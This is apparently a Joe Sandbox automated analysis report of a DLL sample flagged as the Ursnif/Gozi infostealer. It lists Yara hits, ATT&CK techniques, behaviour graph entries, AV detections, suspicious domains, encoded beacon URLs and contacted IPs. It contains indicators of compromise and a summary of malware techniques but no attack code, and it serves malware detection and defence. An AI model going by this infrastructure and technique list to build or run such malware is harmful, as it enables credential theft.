                      Source: Yara matchFile source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1Input Capture1System Time Discovery2Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 500413 Sample: 616412739e268.dll Startdate: 12/10/2021 Architecture: WINDOWS Score: 96 31 outlook.com 2->31 47 Multi AV Scanner detection for domain / URL 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected  Ursnif 2->53 8 loaddll32.exe 1 2->8         started        signatures3 process4 dnsIp5 41 breuranel.website 8->41 43 areuranel.website 8->43 45 11 other IPs or domains 8->45 57 Writes or reads registry keys via WMI 8->57 59 Writes registry values via WMI 8->59 12 rundll32.exe 8->12         started        15 cmd.exe 1 8->15         started        17 rundll32.exe 8->17         started        19 rundll32.exe 8->19         started        signatures6 process7 signatures8 61 System process connects to network (likely due to code injection or exploit) 12->61 63 Writes registry values via WMI 12->63 21 WerFault.exe 23 9 12->21         started        23 rundll32.exe 15->23         started        27 WerFault.exe 9 17->27         started        29 WerFault.exe 2 9 19->29         started        process9 dnsIp10 33 40.97.153.146, 443, 49809, 49860 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->33 35 52.97.137.210, 443, 49811 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->35 39 11 other IPs or domains 23->39 55 System process connects to network (likely due to code injection or exploit) 23->55 37 192.168.2.1 unknown unknown 27->37 signatures11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      616412739e268.dll6%VirustotalBrowse
                      616412739e268.dll24%ReversingLabsWin32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.1370000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.0.rundll32.exe.4970000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.2.rundll32.exe.4970000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.0.rundll32.exe.4970000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.2.rundll32.exe.4cd0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      areuranel.website7%VirustotalBrowse
                      breuranel.website7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;0%Avira URL Cloudsafe
                      https://watson.tel0%VirustotalBrowse
                      https://watson.tel0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      		13.82.28.61
                      		truefalse
                        		high
                        outlook.com
                        		40.97.116.82
                        		truefalse
                          		high
                          HHN-efz.ms-acdc.office.com
                          		52.97.183.162
                          		truefalse
                            		high
                            FRA-efz.ms-acdc.office.com
                            		52.98.207.194
                            		truefalse
                              		high
                              www.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                www.outlook.com
                                		unknown
                                		unknownfalse
                                  		high
                                  areuranel.website
                                  		unknown
                                  		unknowntrueunknown
                                  breuranel.website
                                  		unknown
                                  		unknowntrueunknown
                                  outlook.office365.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jrefalse
                                      		high
                                      https://outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jrefalse
                                        		high
                                        https://msn.com/mail/liopolo/NtZggqxIX2EF9w_2/BavTQ0jHk8z72E0/mrA_2BNo5fGf18qS53/GIhA4FNpc/qIQbJVkxLHpIx3LzJcYF/3uQz3PgIC5Pjndy7vBH/i_2FOaoK6pUzqTQ2mVu3pq/cfXt8VkJHx4pF/9i2ySYSz/e6Fwjd_2BYZ5QEKc2Ev8w_2/FX9nTU6mpV/BkgebLJcyW_2BOHak/X7QoD77ir05E/ic.jrefalse
                                          		high
                                          https://outlook.office365.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jrefalse
                                            		high
                                            https://msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jrefalse
                                              		high
                                              https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jrefalse
                                                		high
                                                https://www.outlook.com/signup/liopolo/rNcthdwaMuA/zHzDKpXzKq0_2F/hgSdOtaWvkDNGgYpqBLqh/fnirw5AL03xUm4gv/1SKDwhrC85cQhDG/iqhTJ3hi9wsaeKx0vI/xO4E5YLZP/YP9uSugvYABSkowPk9S_/2B24KB1lGZ7pVE71wAB/PNLOy1DTAkJRmo3faOVpWQ/D9BP51I5FAmCi/mjxkDJSf_2B0/dO3cuvbU.jrefalse
                                                  		high
                                                  https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXay0D_/2BZ8Igd1CtC/8Zrwrke0SVrRun/EK5gc9OXOLgsoPgBxCQd1/LxUG0ef0GKyYljGP/_2FJyXjT77_2FZy/ZTRUMkvuvl3KPO1sTr/Mf1qwqvM6/BRuq80kiRu4imCu3Mccr/qTiEDWDGE96/Qopva.jrefalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://msn.com/floaddll32.exe, 00000000.00000003.917168598.0000000001701000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://www.msn.com/mail/liopolo/31Pla_2BCXtei/1R_2BY6O/xV8Y0PePoExsKvdRsArLjMT/0HY9ewGl4d/RTh7V4sy0loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://wwtlook.office365.com/loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                          		high
                                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;aloaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                            		high
                                                            https://blogs.msn.com/loaddll32.exe, 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpfalse
                                                              		high
                                                              https://www.outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7Vloaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1184778471.0000000001722000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://deff.nelreports.net/api/report?cat=msnloaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1093682966.000000000170D000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.931542596.00000000058BC000.00000004.00000040.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.msn.com/en-us//api/modules/fetch&quot;loaddll32.exe, 00000000.00000003.1093773062.0000000003BBB000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.917087190.00000000016FB000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                  		high
                                                                  https://web.vortex.data.msn.com/collect/v1/t.girundll32.exe, 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmpfalse
                                                                    		high
                                                                    http://ogp.me/ns/fb#loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                      		high
                                                                      https://outlook.office365.com/2Hloaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://msn.com/loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                                          		high
                                                                          https://msn.com/Dloaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                                            		high
                                                                            https://www.msn.com/?refurl=%2fmail%2fliopolo%2f31Pla_2BCXtei%2f1R_2BY6O%2fxV8Y0PePoExsKvdRsArLjMT%2loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmpfalse
                                                                              		high
                                                                              https://outlook.office365.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/Boloaddll32.exe, 00000000.00000003.1005814049.000000000170B000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005878880.0000000001706000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://outlook.office365.com/loaddll32.exe, 00000000.00000003.1005981116.00000000016C2000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.1093739436.0000000003BBC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.msn.com/?refurl=%2fmail%2fliopolo%2f5hHdOh6aVGIiN%2fxm3v7_2B%2fEkShunhzAo7MsZ9CmkqFWtX%2loaddll32.exe, 00000000.00000003.1093653246.0000000001716000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://www.outlook.com/signup/liopolo/D7_2FrbWNPWoNOhc8CKrYUD/YRyHNJx0fY/hev8f_2BW8cdb94NA/BoQXWWXaloaddll32.exe, 00000000.00000003.1005943661.000000000169F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1005753123.000000000170C000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://ogp.me/ns#loaddll32.exe, 00000000.00000003.1093713289.0000000001713000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.917233460.0000000003B39000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.1108259014.00000000058BB000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                                        		high
                                                                                        https://outlook.office365.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusloaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.1181707542.0000000001715000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.1183944098.000000000164B000.00000004.00000020.sdmpfalse
                                                                                          		high
                                                                                          https://www.msn.com/?refurl=%2fmail%2fliopolo%2fNtZggqxIX2EF9w_2%2fBavTQ0jHk8z72E0%2fmrA_2BNo5fGf18qrundll32.exe, 00000003.00000003.931465010.0000000005839000.00000004.00000040.sdmpfalse
                                                                                            		high
                                                                                            https://outlook.com/signup/liopolo/dtrpOPrEQ8_2/BH4GVvmMwLv/x_2BNp_2Bcq8rr/i2sFrcRmTMjCNusY3oN7V/abYloaddll32.exe, 00000000.00000003.1181590460.00000000016A1000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://outlook.office365.com/9Hloaddll32.exe, 00000000.00000002.1184438243.00000000016C2000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://watson.telWerFault.exe, 0000000C.00000002.928906655.00000000048CC000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.929018615.0000000004983000.00000004.00000001.sdmpfalse
                                                                                                • 0%, Virustotal, Browse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.msn.com/?refurl=%2fmail%2fliopolo%2fQoeEw7znNY9KuZLPv%2fPhlDvAFg0Bnn%2fnVx6DnTynJS%2fJqerundll32.exe, 00000003.00000003.1108208109.00000000058BC000.00000004.00000040.sdmpfalse
                                                                                                  		high

                                                                                                  Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  52.98.207.194
                                                                                                  		FRA-efz.ms-acdc.office.comUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  52.97.218.66
                                                                                                  		unknownUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                  52.97.218.82
                                                                                                  		unknownUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  40.101.124.226
                                                                                                  		unknownUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  40.97.153.146
                                                                                                  		unknownUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                  13.82.28.61
                                                                                                  		msn.comUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  52.97.137.210
                                                                                                  		unknownUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                                  40.97.116.82
                                                                                                  		outlook.comUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                  52.97.183.162
                                                                                                  		HHN-efz.ms-acdc.office.comUnited States
                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                  Analysis ID:500413
                                                                                                  Start date:12.10.2021
                                                                                                  Start time:00:35:10
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 11m 23s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Sample file name:616412739e268.dll
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:27
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal96.troj.evad.winDLL@14/12@24/10
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 18% (good quality ratio 16.9%)
                                                                                                  • Quality average: 77.6%
                                                                                                  • Quality standard deviation: 30%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 68%
                                                                                                  • Number of executed functions: 65
                                                                                                  • Number of non-executed functions: 206
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Found application associated with file extension: .dll
                                                                                                  • Override analysis time to 240s for rundll32
                                                                                                  Warnings:
                                                                                                  Show All
                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 23.203.141.148, 93.184.221.240, 8.247.248.223, 8.247.248.249, 8.247.244.249, 20.82.210.154, 13.89.179.12, 204.79.197.203, 52.168.117.173, 20.189.173.22, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60, 52.184.81.210
                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, fg.download.windowsupdate.com.c.footprint.net, onedsblobprdwus17.westus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, a-0003.a-msedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  00:37:39API Interceptor8x Sleep call for process: rundll32.exe modified
                                                                                                  00:37:49API Interceptor8x Sleep call for process: loaddll32.exe modified
                                                                                                  00:37:57API Interceptor3x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  40.101.124.226S5.exeGet hashmaliciousBrowse
                                                                                                    40.97.153.146m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                      test1.dllGet hashmaliciousBrowse
                                                                                                        7.dllGet hashmaliciousBrowse
                                                                                                          nT5pUwoJSS.dllGet hashmaliciousBrowse
                                                                                                            5instructio.exeGet hashmaliciousBrowse
                                                                                                              .exeGet hashmaliciousBrowse
                                                                                                                61Documen.exeGet hashmaliciousBrowse
                                                                                                                  65document.exeGet hashmaliciousBrowse
                                                                                                                    29mail98@vip.son.exeGet hashmaliciousBrowse
                                                                                                                      57document.exeGet hashmaliciousBrowse
                                                                                                                        13.82.28.6145DOC00111738011537818635391-pdf.exeGet hashmaliciousBrowse
                                                                                                                        • msn.com/

                                                                                                                        Domains

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        outlook.comP2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        in7BcpKNoa.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        aXNdDIO708.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        vhPaw5lCuv.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        5sTWnI5RoC.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.0
                                                                                                                        57wF9hu0V5.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.0
                                                                                                                        7zxmUw3Ml1.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        Nh1UI4PFGW.exeGet hashmaliciousBrowse
                                                                                                                        • 52.101.24.0
                                                                                                                        rEYF2xcbGR.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.1
                                                                                                                        G2Shy4flZe.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.207.1
                                                                                                                        2nqVnWlyLp.exeGet hashmaliciousBrowse
                                                                                                                        • 52.101.24.0

                                                                                                                        ASN

                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSm87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 40.101.60.226
                                                                                                                        m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.151.66
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 13.82.28.61
                                                                                                                        B6VQd36tt6.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.183.162
                                                                                                                        P2AN3Yrtnz.exeGet hashmaliciousBrowse
                                                                                                                        • 40.93.212.0
                                                                                                                        b3astmode.x86Get hashmaliciousBrowse
                                                                                                                        • 72.154.237.78
                                                                                                                        b3astmode.arm7Get hashmaliciousBrowse
                                                                                                                        • 20.153.181.154
                                                                                                                        b3astmode.arm7-20211011-1850Get hashmaliciousBrowse
                                                                                                                        • 20.63.129.213
                                                                                                                        TNIZtb3HS3.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.65.92
                                                                                                                        PROFORMA INVOICE -PI6120..htmlGet hashmaliciousBrowse
                                                                                                                        • 40.101.62.34
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 52.168.117.173
                                                                                                                        ntpclientGet hashmaliciousBrowse
                                                                                                                        • 21.215.78.72
                                                                                                                        2021catalog-selected products.xlsmGet hashmaliciousBrowse
                                                                                                                        • 13.92.100.208
                                                                                                                        K6E9636KoqGet hashmaliciousBrowse
                                                                                                                        • 159.27.209.248
                                                                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                                                                        • 20.42.73.29
                                                                                                                        Hm7d40tE44.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        mixsix_20211008-150045.exeGet hashmaliciousBrowse
                                                                                                                        • 20.189.173.22
                                                                                                                        SecuriteInfo.com.W32.AIDetect.malware2.21009.exeGet hashmaliciousBrowse
                                                                                                                        • 104.47.53.36
                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSm87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 40.101.60.226
                                                                                                                        m87xfb63XU.dllGet hashmaliciousBrowse
                                                                                                                        • 52.97.151.66
                                                                                                                        6yDD19jMIu.dllGet hashmaliciousBrowse
